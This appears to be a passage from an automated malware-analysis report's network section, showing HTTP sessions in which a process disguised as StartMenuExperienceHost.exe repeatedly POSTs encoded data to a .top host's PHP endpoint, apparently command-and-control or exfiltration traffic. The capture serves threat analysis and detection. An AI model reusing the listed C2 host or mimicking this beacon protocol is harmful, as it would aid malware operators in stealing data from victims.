                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:36:32.204158068 CEST12360OUTData Raw: 55 5d 58 58 54 5e 5d 55 5e 5a 55 58 51 5d 5a 5d 57 51 58 59 55 5d 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U]XXT^]U^ZUXQ]Z]WQXYU]Q_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:+?)#2.'(,X6,(:7'('&>/6=;#Y$/\*
                                                                Oct 11, 2024 01:36:32.209348917 CEST2472OUTData Raw: 30 3f 03 04 3d 30 3b 37 06 3f 33 56 07 2a 53 0a 35 3b 0f 2d 0b 20 21 5d 08 3f 25 13 29 02 2f 0e 20 24 55 1a 36 04 4b 24 0c 3a 17 2e 11 5f 03 34 38 55 1a 5d 06 2e 3f 20 38 3d 3c 12 0e 2f 35 28 0c 3c 23 3b 3a 3d 31 07 0e 21 13 58 2a 57 1c 2c 27 3b
                                                                Data Ascii: 0?=0;7?3V*S5;- !]?%)/ $U6K$:._48U].? 8=</5(<#;:=1!X*W,';#49Z" ^9:%3[>/ %)V;==."7+0#8<R=?YB66U^;+8,5"!1:>,5:".(9([+&<C+-29:>?)&$ .;[ 4<2:^)0#53;-!]70[(B7Y*8<0!!X<7ZHT33*
                                                                Oct 11, 2024 01:36:32.209369898 CEST2472OUTData Raw: 2c 2a 10 19 34 3f 03 00 3b 1b 3f 5f 09 05 38 39 07 33 0a 04 34 3a 25 1d 08 06 16 21 2c 0b 2c 5a 31 2e 5a 58 2b 30 06 3b 26 1e 34 22 2f 58 55 2f 35 5c 06 5e 3d 59 08 13 38 5a 38 1a 2b 0f 31 2e 07 0e 14 59 22 09 2c 50 2d 55 08 20 31 08 00 1e 33 20
                                                                Data Ascii: ,*4?;?_8934:%!,,Z1.ZX+0;&4"/XU/5\^=Y8Z8+1.Y",P-U 13 E648ZS/?W,7D>-9%[ A6^$TQ!_!?$/9!>:+]#\20*T<,%,=YSY0W561X&:6:+Y1-3)\</\=<>-<_6+7:][%03U=&8.YP,\;!0
                                                                Oct 11, 2024 01:36:32.209415913 CEST2472OUTData Raw: 0f 3b 09 1c 3f 05 2f 3a 3c 5f 22 02 3d 3a 13 3f 02 58 0d 23 29 3e 2f 35 21 03 28 1b 39 07 27 30 0e 23 00 18 02 13 01 3f 12 28 1a 25 0b 10 2b 06 00 35 0d 21 22 29 3b 5b 3c 0a 04 2d 37 0a 06 13 3f 3c 32 0c 2a 38 27 1d 3b 56 01 21 04 06 28 21 3c 31
                                                                Data Ascii: ;?/:<_"=:?X#)>/5!(9'0#?(%+5!");[<-7?<2*8';V!(!<1(7(08U-U^84 ?&W9,[!)(-1#[ '/$=Z5-A#:>*()?X%X'Y2Q2P1+V$-W%\2:; 2,U*>1:4 )/(::=&Y9)*/= 6.6YG7;&8_Q"7U:>"= #
                                                                Oct 11, 2024 01:36:32.209436893 CEST2472OUTData Raw: 25 1d 39 0b 05 3e 2e 2e 3e 3d 03 59 0d 54 05 2f 3e 3f 06 31 31 3b 23 09 05 3b 03 3e 21 2c 35 21 3e 3d 26 51 2a 2a 2f 26 21 0f 08 34 09 2f 02 3e 0c 2a 0b 0f 3b 5d 1f 28 30 3f 3b 5b 30 08 3c 58 20 23 27 13 36 58 04 52 3c 02 5c 38 0c 2f 3a 5c 3d 59
                                                                Data Ascii: %9>..>=YT/>?11;#;>!,5!>=&Q**/&!4/>*;](0?;[0<X #'6XR<\8/:\=YVX23&$(8R>!31%5*;%542!'Z2[/=RX:=%?2% %3?=?#2 \?-!78+3!$>(<#;*=7Y'<1%3._"51#9=>();%U9"2Z*106$80.35#_/-><.7/0%>
                                                                Oct 11, 2024 01:36:32.209471941 CEST2472OUTData Raw: 34 04 58 3c 04 37 3b 2c 02 37 2a 21 35 57 29 23 0b 1c 3c 07 3e 5b 53 2b 02 5a 38 15 03 3b 31 14 39 32 28 21 2c 30 01 5e 05 2c 13 5d 3f 0f 33 5e 0f 35 27 1f 2e 3e 26 14 08 3b 2b 5f 3d 3d 17 1f 24 2d 09 59 05 3a 39 28 35 34 39 19 10 0c 5b 2b 28 1c
                                                                Data Ascii: 4X<7;,7*!5W)#<>[S+Z8;192(!,0^,]?3^5'.>&;+_==$-Y:9(549[+(&_<&%>#22)=Q9[-=?>*;C5\> 65*;&%)"R/0$^!<!.%U ,?92-_?853)( XY :&>!(==)P($);9T/',I%7#^21<+7,\("+*" V0Y&
                                                                Oct 11, 2024 01:36:32.209489107 CEST2472OUTData Raw: 0f 2e 2e 10 03 0b 14 3f 38 04 20 1c 25 2e 54 2a 25 17 31 14 0f 2a 31 3c 35 07 15 12 06 58 33 28 12 04 34 25 3b 00 24 5c 38 05 22 06 3f 05 02 11 3c 5e 3b 14 24 5a 2f 3e 00 1c 37 3e 35 01 3b 5b 3c 3f 1c 23 0b 1e 0d 11 3d 5b 2e 0a 29 2b 54 30 0b 22
                                                                Data Ascii: ..?8 %.T*%1*1<5X3(4%;$\8"?<^;$Z/>7>5;[<?#=[.)+T0">!0#'4+ :#<?RY:1W);XZ=;37.<(&50";(4\5/!1[:T3** <!/U(>Z(235Q5-Z:1$ R46<)?A5(;:5*Y:<##]1" T;)4T-=-'
                                                                Oct 11, 2024 01:36:32.209573984 CEST4944OUTData Raw: 35 33 36 21 2b 0f 51 28 24 0d 3a 38 32 3c 5d 34 3d 32 1b 1e 20 55 5d 10 3e 03 0e 09 07 04 34 46 3d 29 00 1f 0f 5a 17 23 34 04 3a 2c 29 2b 5c 29 35 0f 3a 04 36 5b 1a 55 39 2b 07 0e 13 5f 13 0e 0e 0a 58 1e 35 0c 27 04 23 00 57 57 3f 02 2d 17 0a 3c
                                                                Data Ascii: 536!+Q($:82<]4=2 U]>4F=)Z#4:,)+\)5:6[U9+_X5'#WW?-<P1Z4 6;#/$<Y\#\*":>R11/-Z;_']6?=*.7X]%80V9[!+6?!;00%U7/5*(+5'0S7[T=4'^*#W#B0#,53(92)#:"/["3>,R?4Z&8::0"(X4^=&;
                                                                Oct 11, 2024 01:36:32.209599972 CEST2472OUTData Raw: 20 2e 37 23 3b 33 1b 2b 26 03 21 39 29 20 2a 3e 38 5d 33 17 20 59 0e 5c 3c 28 26 00 38 3b 35 50 03 2d 37 25 02 32 33 1b 3c 5e 23 58 3a 3d 01 22 0b 58 32 26 34 2e 2f 3d 26 29 38 24 3c 04 27 06 34 42 15 35 0f 39 3f 5b 2a 54 00 2d 3b 38 20 0b 25 5b
                                                                Data Ascii: .7#;3+&!9) *>8]3 Y\<(&8;5P-7%23<^#X:="X2&4./=&)8$<'4B59?[*T-;8 %[.+7$U.2Z_6)-'(47Z2;2!14%,<[6+]%-!X'0U?96<18$<7-].?(71!=+-$(&2?$04'3!< *^3?*0]&Z! ;)(<U48W*4"1 +_#>(6XQ*%S;&T3
                                                                Oct 11, 2024 01:36:32.209624052 CEST2472OUTData Raw: 32 3a 22 18 24 31 0a 3c 31 0c 32 22 34 32 2a 01 30 0a 17 06 36 58 31 50 25 3e 39 29 3a 55 05 29 33 2f 1d 1e 38 5e 02 46 36 5c 07 1e 37 04 25 04 3e 10 22 22 3d 24 2f 11 3a 24 55 26 0d 58 1a 3f 22 35 35 2a 13 06 52 2c 33 1d 05 3f 01 08 2f 2e 37 06
                                                                Data Ascii: 2:"$1<12"42*06X1P%>9):U)3/8^F6\7%>""=$/:$U&X?"55*R,3?/.7(5?70[;3&<=?,8)?<:_>^3%>>#6!])6>#;0+?=]/9=X'*&\^?(&"9'$-35>130=2;=6_71!%B2W>7W"1+1<>,T[>18.&6$[*78
                                                                Oct 11, 2024 01:36:32.296217918 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:33.404448986 CEST589INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:33 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jwlHSj8kDgOd2uC4wFdE4j0R6gfdAq6jWFwQcPHr9Uu7uKBwGTe530jJJxa2OzqAMEuTTKpEwLMAGFhuWpARFKrwo8hcbCUk38XruM6VQksTE1YlcwmV9ByuZ6SMWIf2J01rIwvk"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6ee18b460cac-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.549795188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:33.463356018 CEST310OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 540
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:33.816741943 CEST540OUTData Raw: 50 5f 58 5e 54 5f 5d 52 5e 5a 55 58 51 53 5a 5b 57 5d 58 5d 55 50 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P_X^T_]R^ZUXQSZ[W]X]UPQ_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9)=<*1/*%!3X(3=U7(0%=8 28Z(+#Y$/\*9
                                                                Oct 11, 2024 01:36:33.932378054 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:34.179050922 CEST601INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:34 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Xi94oQEl%2BPcG%2FZytHkaDenMCcRXBzGKmb7NmKeIUK5AI7e%2F%2B%2B7miHeXgKuQy8ZAsrv3iNjVxofIm0eqMkA0sIF5APYTgEk1hjzkgxglGlhB%2BLJYm8fYAmhwu1rXKewBDcAXnEtA"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6eebcc1d8cbd-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:36:34.183630943 CEST346OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----D8uRY6zZHiCD11yIzdIT3kMfNkb2krW7Gn
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2766
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:34.281801939 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:34.281935930 CEST2766OUTData Raw: 2d 2d 2d 2d 2d 2d 44 38 75 52 59 36 7a 5a 48 69 43 44 31 31 79 49 7a 64 49 54 33 6b 4d 66 4e 6b 62 32 6b 72 57 37 47 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                Data Ascii: ------D8uRY6zZHiCD11yIzdIT3kMfNkb2krW7GnContent-Disposition: form-data; name="0"Content-Type: text/plainU_]\T^XR^ZUXQ\ZRWQX^UVQSXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^P
                                                                Oct 11, 2024 01:36:34.545943022 CEST601INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:34 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IwK9FpfgeG9eh9TXmYHmYMN%2BMRg%2F%2F0LhElkow0zkEZPmxQK9c36NYU9u%2F1QI85R7fL5%2FiyLyWoyuUERAvcwcwqz5AVOHlWnH588oc5C82oajPvpemlVc3atc6jx%2F8fTefMqNfUL0"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6eedfefd8cbd-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:36:34.797743082 CEST601INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:34 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IwK9FpfgeG9eh9TXmYHmYMN%2BMRg%2F%2F0LhElkow0zkEZPmxQK9c36NYU9u%2F1QI85R7fL5%2FiyLyWoyuUERAvcwcwqz5AVOHlWnH588oc5C82oajPvpemlVc3atc6jx%2F8fTefMqNfUL0"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6eedfefd8cbd-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.549805188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:34.925398111 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:35.269998074 CEST1984OUTData Raw: 55 59 58 5a 51 5c 58 5e 5e 5a 55 58 51 56 5a 5b 57 51 58 54 55 52 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UYXZQ\X^^ZUXQVZ[WQXTURQ_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:(>,[<\;2-/+ 5;,(*#$3=%W*<C5'>#Y$/\*-
                                                                Oct 11, 2024 01:36:35.386348963 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:35.655703068 CEST744INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:35 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w0RyqT1bPN6DERuusH%2Fbpy%2BSDATOAdwwQOMG%2FPCwxZ4nfxmSnoEp41IqKAej4LYpscBsS0wXJ1l5BmtTBxeOQxTpxcNdBaAXC0QM5TkCiYeaClb3o17jtMpwlzyloEBq4yv1T65P"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6ef4db7a4374-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5d 3d 3a 31 0c 34 58 28 03 38 32 24 10 2a 13 2e 14 29 22 38 03 25 1a 3f 1a 2e 2c 2e 0f 21 28 23 07 2a 2f 32 11 24 12 27 5d 2b 1b 2a 51 03 1b 39 11 28 0d 3b 1c 3f 32 03 16 3f 0b 31 15 27 1d 3d 43 29 3d 29 1d 25 3d 3e 58 21 31 24 57 3d 2c 3f 55 2f 3b 02 1b 28 28 2a 11 23 2b 2a 5f 08 13 39 13 29 5e 3c 1e 35 27 2a 06 23 3d 37 54 21 17 04 57 29 17 03 0e 27 20 38 14 2f 21 28 5b 34 2f 0e 0e 35 12 36 56 20 3e 37 02 32 02 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98']=:14X(82$*.)"8%?.,.!(#*/2$']+*Q9(;?2?1'=C)=)%=>X!1$W=,?U/;((*#+*_9)^<5'*#=7T!W)' 8/!([4/56V >72"_")Q?TR0
                                                                Oct 11, 2024 01:36:35.770366907 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:35.868626118 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:35.868817091 CEST1984OUTData Raw: 50 5d 58 58 51 5b 5d 52 5e 5a 55 58 51 57 5a 5d 57 5d 58 59 55 51 51 5a 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P]XXQ[]R^ZUXQWZ]W]XYUQQZXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9\<=/<*;R%;+C+!+'Y)3=W7#$-1S*"1;*;#Y$/\*)
                                                                Oct 11, 2024 01:36:36.176870108 CEST741INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:36 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ALLQ%2FyJwd1dYGEITcVgGWdPl2Hh88PdLARkxlagVgE6TF6Uaf0gxqAazJQ6QCHvXBStCC%2F%2BZdDNcu4EVGYySJDI%2F5ydqk1UPEr4AFWmtoClIWEVqmr5BPZhoPdbJSiOosCV3aCuD"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6ef7defd4374-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 16 3d 07 22 1d 22 2e 2b 5c 2c 0f 20 13 3d 13 2a 5d 3c 0f 2b 12 25 24 38 01 2e 12 08 0d 23 2b 2c 5f 2a 3c 32 12 24 3c 37 59 3c 21 2a 51 03 1b 39 59 3c 1d 05 57 28 0b 3a 06 3f 0b 2d 5c 24 20 39 08 3e 2d 35 1f 27 58 25 06 36 21 24 53 29 3c 3f 56 3b 15 2c 1d 29 38 21 00 34 01 2a 5f 08 13 39 54 2a 16 05 0e 21 24 22 04 23 3e 28 0e 36 17 3a 56 3f 29 2a 54 27 55 33 00 2c 1c 09 02 21 3f 2b 50 23 2f 31 0c 34 2d 30 13 25 12 22 5f 22 00 29 51 00 3f 54 52 0d 0a
                                                                Data Ascii: 98'="".+\, =*]<+%$8.#+,_*<2$<7Y<!*Q9Y<W(:?-\$ 9>-5'X%6!$S)<?V;,)8!4*_9T*!$"#>(6:V?)*T'U3,!?+P#/14-0%"_")Q?TR
                                                                Oct 11, 2024 01:36:36.316111088 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Oct 11, 2024 01:36:36.426717997 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:36.526575089 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:36.526843071 CEST1984OUTData Raw: 55 5e 5d 5b 54 5e 58 5f 5e 5a 55 58 51 5d 5a 59 57 5e 58 58 55 50 51 53 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U^][T^X_^ZUXQ]ZYW^XXUPQSXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9])=]<<&(C Y5;?()7/'=>#60*#Y$/\*
                                                                Oct 11, 2024 01:36:36.820775032 CEST744INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:36 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wGOy6LcA8lnPmxSHaqmt9Ao7WdC5iafWnAqft3Ws4JOxiebVH%2FEKxsndQPitsAylXiuZB776J6QdumeoB0zlbIwDSch%2BMB0wTwoJGlk1lmojlFF7k7QmQAh7BleMEz%2BGYizM4Qac"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6efbfbcd4374-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5f 29 29 22 1e 34 58 2b 10 38 32 27 01 3d 3d 26 5c 3f 0f 27 58 24 34 3c 00 2e 5a 36 0e 36 05 01 00 28 3c 3e 1c 24 2f 3b 12 2b 31 2a 51 03 1b 39 5b 3e 23 3b 55 3c 22 39 17 3c 0c 0c 05 24 0d 3d 0b 29 13 21 1c 24 58 2e 15 36 21 3b 0c 2a 3f 30 0f 2f 02 3c 19 3d 06 00 59 23 11 2a 5f 08 13 39 13 3d 38 2b 08 36 34 26 00 35 3e 3f 54 36 39 08 56 3d 3a 26 1e 24 55 3f 06 2d 21 38 5a 21 3f 28 0c 35 12 36 54 34 3d 06 5c 32 02 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'_))"4X+82'==&\?'X$4<.Z66(<>$/;+1*Q9[>#;U<"9<$=)!$X.6!;*?0/<=Y#*_9=8+64&5>?T69V=:&$U?-!8Z!?(56T4=\2"_")Q?TR0
                                                                Oct 11, 2024 01:36:36.926450968 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:37.025099039 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:37.025274992 CEST1984OUTData Raw: 50 52 58 5f 54 5c 5d 55 5e 5a 55 58 51 5c 5a 5f 57 5c 58 54 55 57 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PRX_T\]U^ZUXQ\Z_W\XTUWQ[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9(<X?<1 @(67!3X+3U#$4'>-((85!8X*#Y$/\*
                                                                Oct 11, 2024 01:36:37.320568085 CEST750INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:37 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3m%2BY1xDNMfphtKrjFnWS4P8sGrHbrCBZs2Hcep%2B50FCV3B%2FlfX2w08%2FLvEZ28XAP4kjgZlb7hhTS7ziaMM9vh0LyfwK6Xymu5JgHDAOdmAJKAYXW4%2BUBqeQTQNoAhu%2FOGSY2A8yy"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6eff1ed84374-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5d 28 39 3e 52 23 2d 37 12 2c 1f 3c 5a 2a 03 21 06 28 21 0a 00 26 1a 33 5d 3a 3f 3e 0b 22 3b 34 5c 29 2f 2d 06 33 3f 33 59 29 31 2a 51 03 1b 39 5a 3c 33 27 1d 28 32 31 19 29 31 3a 06 27 0a 29 09 2a 3d 2e 0e 24 2e 03 00 21 08 24 1c 2a 05 23 1f 2f 02 3f 44 2a 38 00 5a 23 01 2a 5f 08 13 39 13 3d 38 3f 0c 20 27 25 14 36 2d 1e 0b 21 07 2d 09 3e 00 3e 56 24 30 27 06 2f 1c 20 1d 23 2f 33 57 23 3f 3d 0d 23 3d 2f 03 26 12 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'](9>R#-7,<Z*!(!&3]:?>";4\)/-3?3Y)1*Q9Z<3'(21)1:')*=.$.!$*#/?D*8Z#*_9=8? '%6-!->>V$0'/ #/3W#?=#=/&"_")Q?TR0
                                                                Oct 11, 2024 01:36:37.427189112 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
